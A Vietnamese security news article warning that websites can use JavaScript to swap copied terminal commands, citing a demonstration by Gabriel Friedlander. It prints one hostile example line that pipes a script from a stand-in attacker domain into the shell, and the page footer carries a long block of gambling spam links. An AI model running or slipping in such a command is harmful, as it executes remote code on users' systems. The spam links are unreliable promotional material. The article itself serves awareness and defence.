• Kiến thức
  • Network
  • Security
  • Software
  • Thủ thuật
  • Tin học văn phòng
  • Tin tức
  • Mail ảo tạm thời miễn phí
  • Tools tra cứu thông tin
  • Công cụ đổi số thành chữ
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

Cẩn thận khi Copy Code từ các trang Web – Bạn có thể bị Hack

AnonyViet by AnonyViet
04/01/2022
in Tin tức
A A
0

Các Lập trình viên, Sysadmins, nhà nghiên cứu bảo mật và những người yêu thích công nghệ  và tui thường hay Copy-Paste lệnh cấu hình, cài đặt thì các trang Web hướng dẫn cho nhanh, thay vì phải gõ lại từng câu lệnh. Tuy nhiên hành động này được cảnh báo dễ gây nguy hiểm và có thể khiến hệ thống bị Hack bởi khi Copy là 1 lệnh nhưng Paste ra là lệnh khác.

📢 Tham gia kênh Telegram của AnonyViet
👉 Vào Telegram AnonyViet
Cập nhật bài mới, tools hay và thủ thuật IT nhanh nhất

Một chuyên gia bảo mật đã thực hiện một thủ thuật đơn giản sẽ khiến bạn phải suy nghĩ kỹ trước khi copy và dán bất kỳ lệnh nào từ các trang web không tin cậy.

Các bài viết liên quan

Dùng W7SFW Để Chống Virus Và Bảo Mật Website WordPress 3

Dùng W7SFW Để Chống Virus Và Bảo Mật Website WordPress

11/03/2026
ung dung cau nguyen iran bi hack

Ứng dụng cầu nguyện của Iran bị hack, gửi thông điệp kêu gọi đầu hàng

01/03/2026
cdoe tuyet trang trang tri website

Chia sẻ Code tuyết rơi cho Website đón Giáng Sinh

16/12/2025
Cách đặt bảo mật 2 lớp cho ChatGPT 4

Cách đặt bảo mật 2 lớp cho ChatGPT

06/10/2025

Cẩn thận khi Copy Code từ các trang Web khác - bạn có thể bị Hack

Lỗ hổng từ Clipboard – khay nhớ tạm

Gần đây, Gabriel Friedlander, người sáng lập nền tảng Wizer –  chuyên đào tạo nâng cao nhận thức về bảo mật đã thí nghiệm một vụ Hack đơn giản nhưng đáng ngạc nhiên sẽ khiến bạn phải thận trọng khi Copy các lệnh từ các trang web.

Việc Copy các lệnh thường dùng từ một trang web (ahem, StackOverflow) và dán chúng vào công cụ dòng lệnh (terminal) như CMD Windows hoặc Terminal Linux là điều rất quen thuộc đối với lập trình viên mới vào nghề hoặc những người lười như mình.

Nhưng Friedlander cảnh báo một trang web có thể được thay thế một cách bí mật nội dung của những gì có trên Clipboard của bạn và những gì thực sự được Copy vào khay nhớ tạm của bạn sẽ khác rất nhiều so với những gì bạn định sao chép.

Tệ hơn nữa, nếu không có bước kiểm tra cần thiết, lập trình viên có thể chỉ nhận ra lỗi của họ sau khi dán văn bản, lúc này có thể đã quá muộn.

Bạn có thể thực nghiệm kiểu Hack này tại trang https://www.wizer-training.com/blog/copy-paste.

Hãy thử copy dòng trên trang web, sau đó dán ra notepad hoặc bất cứ đâu.

hack copy paste

Bạn sẽ thấy kết quả không phải là sudo apt update mà là

curl http://attacker-domain:8000/shell.sh | sh

Nhiều người cứ nghĩ là họ đang copy một câu lệnh Update hệ thống của Linux, tưởng chừng như vô hại, nhưng thật ra trong bộ nhớ tạm đang lữu trữ lệnh tải shell.sh và thực thi sau khi tải xong.

Những người dán văn bản có thể có ấn tượng rằng họ đang sao chép cập nhật lệnh sudo apt quen thuộc, vô hại được sử dụng để tìm nạp thông tin cập nhật trên phần mềm được cài đặt trên hệ thống của bạn.

Thật ra khi view-source Website bạn sẽ thấy có một đoạn javascript có chức năng đổi nội dung khi bạn thực hiện lệnh Copy từ trang web đó.

Để khắc phục tình trạng này, bạn có thể dùng một số extension chặn javascript trên Chrome như: ScriptBlock, Disable JavaScript, Toggle JavaScript… nhưng nếu dùng như vậy, khi vào một số trang web dùng javascript sẽ bị lỗi hiển thị. Tốt nhất là khi copy nội dung gì, thì dán vào notepad trước khi xem nó ra đúng nội dung không, sau đó hãy dán vào Terminal

Tags: bảo mậtclipboardCopy Codehackjavascript
AnonyViet

AnonyViet

20 năm kinh nghiệm trong lĩnh vực Security, các chứng chỉ:OSCP, CCNA, CCNP, CISSP. Kiến thức như một ngọn lửa, càng chia sẽ nó sẽ càng bùng cháy!

Related Posts

Dùng W7SFW Để Chống Virus Và Bảo Mật Website WordPress 5
Mạng cơ bản

Dùng W7SFW Để Chống Virus Và Bảo Mật Website WordPress

11/03/2026
ung dung cau nguyen iran bi hack
Tin tức

Ứng dụng cầu nguyện của Iran bị hack, gửi thông điệp kêu gọi đầu hàng

01/03/2026
cdoe tuyet trang trang tri website
Code

Chia sẻ Code tuyết rơi cho Website đón Giáng Sinh

16/12/2025
Cách đặt bảo mật 2 lớp cho ChatGPT 6
Kiến thức

Cách đặt bảo mật 2 lớp cho ChatGPT

06/10/2025
Cách Active Key Sublime Text 4 - Tải Sublime Text 4 Full Key 7
Phần mềm máy tính

Cách Active Key Sublime Text 4 – Tải Sublime Text 4 Full Key

23/05/2025 - Updated on 25/07/2025
Hướng dẫn học lập trình miễn phí với Vue School 8
Khóa Học

Hướng dẫn học lập trình miễn phí với Vue School

02/03/2025 - Updated on 25/07/2025
guest

guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
oldest
newest

Liên hệ Quảng Cáo

Lien he AnonyViet

Bài viết mới

cách tạo ảnh chân dung sang chảnh

Cách tạo ảnh chân dung sang chảnh bằng ứng dụng Dola

by Thanh Kim
24/06/2026
0

cách sử dụng Gemini Omni

Hướng dẫn cách sử dụng Gemini Omni để tạo video chân thực

by Thanh Kim
23/06/2026
0

cách nhận 30GB data VinaPhone miễn phí

Cách nhận 30GB data VinaPhone miễn phí dịp sinh nhật 30 năm

by Thanh Kim
22/06/2026
0

tên miền miễn phí 1 năm từ Gravatar

Cách nhận Domain miễn phí 1 năm từ Gravatar

by Thanh Kim
22/06/2026 - Updated on 23/06/2026
0

Bình luận gần đây

  • AnonyViet trong Share key Driver Booster 13 Pro miễn phí 2026
  • adasdav trong Share key Driver Booster 13 Pro miễn phí 2026
  • thanhlong trong EaseUS Data Recovery Wizard – khôi phục dữ liệu đã mất !
  • 45555 trong Trang web tra lịch thi đấu World Cup 2026 trực quan, đồng bộ lịch tự động
  • Dương HỒng Tỷ trong Cách sử dụng sách giáo khoa online miễn phí từ lớp 1 đến lớp 12
  • well trong Hướng dẫn cách nhận Google AI Pro 1 năm miễn phí cho tài khoản mới
  • sang trong Share key Driver Booster 13 Pro miễn phí 2026
  • Dung trong Cách Active Key Sublime Text 4 – Tải Sublime Text 4 Full Key
  • việt trong Hướng dẫn nhận Lovable Pro 12 tháng miễn phí
  • AnonyViet trong Cách tạo ảnh Tốt nghiệp mầm non cho bé đẹp như Studio
  • việt trong Cách tạo ảnh Tốt nghiệp mầm non cho bé đẹp như Studio
  • AnonyViet trong Tool gỡ key phần mềm lậu hàng loạt để tránh bị phạt
  • Aboyit trong Tool gỡ key phần mềm lậu hàng loạt để tránh bị phạt
  • iraq trong Share key Driver Booster 13 Pro miễn phí 2026
  • tu an trong Share key Driver Booster 13 Pro miễn phí 2026
  • Huy dấu tên trong SafeKid – Tiện ích chặn video AI, giúp trẻ xem YouTube an toàn
  • dang ka trong Hướng dẫn nhận 1 tháng ChatGPT Plus miễn phí
  • AnonyViet trong Cách chặn quảng cáo pop-up trên Safari không cần cài app
  • Thanh Kim trong Cách tạo Bộ sưu tập sticker khuôn mặt bằng ChatGPT
  • Han Jue trong Cách chặn quảng cáo pop-up trên Safari không cần cài app

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: support[@]anonyviet.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

DMCA.com Protection Status

kết quả xổ số hôm nay 33win Ae888 kubet kubet 8kbet 99ok trang chủ sc88 xin88 good88 kubet fm88 kubet thailand vip66 xoso66 https://tp88fun.com/ hello88 qq88 Xoso66 Vip66 hitclub bong99 XOSO66 new882.info Thabet fun88 nhà cái uy tín sunwin sunwin rikvip hitclub sunwin go88 12bet v9bet betvisa betvisa vin777 vin777 ee88 bet88 abc8 c54 https://keonhacai.fund/ sunwin Xoso66 58win fun88.supply https://fun88.supply/ F8BET80 u888 W88 link https://bbet88b.com/ OK9 vswin 789PCOM NHÀ CÁI MMOO TT88COM GO 99 https://nowgoal.ws/ https://tylekeonhacai.me/ https://keonhacai.org.vc/ https://xx88.ac/ https://xx88.asia/ 789f NOHU HITCLUB Sunwin 58WIN MV88 888NEW AZ888 TD88 12bet v9bet vip66 7mcn hm88 DA88 9BET LC88 Game NOHU90 https://go8.red/ Go88 https://bancadoithuong.codes/ https://danhdeonline.blog/ Xocdia88 https://nhacaiuytin10.uk.com/ https://keonhacai88.tv/ https://keonhacai.loans/ https://gamebaidoithuong.io/ https://keonhacai.kiwi/ 789club Sun52 kjc https://go99.mx/ nhà cái MB66 Alo789 Thabet sun win luck8 https://devmarks.io V9bet https://f168.today/ Jun88 https://keonhacaitop.com/ hytw3339 Kết quả bóng đá xoso66 https://kjcgaming.com/ go88 U888 nạp tiền qq88 F168 F 168 kèo nhà cái game nổ hũ tỷ lệ nhà cái https://sunwin.guru/ https://go88.baby/ https://hitclub.cab/ https://iwin.page/ https://b52.you/ https://789club-ceo.net/ https://manclub99.com/ https://choigamebai.org/ https://keonhacai95.com/ nổ hũ uy tín F168 https://kjcgaming.com/ 12bet 12bet nhà cái F168 kubet SKY88 UY88 https://luckywin-bet.com/ Fun88 8day tỷ lệ kèo 58WIN 88AA 3WIN 888VI NK88 LV88 https://sc88.plus/ game bài WIN678 6789 kv999 F168 F168 https://sc88.market/ TẢI SUNWIN https://sc88.plus/ https://gmnc.club/ vip88 99ok 8kbet SHBET https://fly88h.com/ https://sunwinn.band/ https://keonhacai55.de/ https://keonhacai55.bet/ 7mcn rikvip sunwin keonhacai5 ok 8386 trang chủ MB66 https://xx88.center/ KK55 Hoiquantv Hoiquantv Hoiquantv thapcamtv live thapcamtv live 90phut tiengruoi luongsontv luongsontv xx88 789club Jun88 888slot Hm88 TG88 TR88 AF88 58WIN JBO go88 Rikvip Bắn cá đổi thưởng Good88 https://zonic.sa.com/ Bong88 Game bài đổi thưởng Vn88 F 168 SH BET Xoilac TV bóng đá trực tiếp bóng đá trực tiếp cakhia tv trực tiếp bóng đá tối nay SKY88

©2026 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về CNTT

No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC

©2026 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về CNTT

wpDiscuz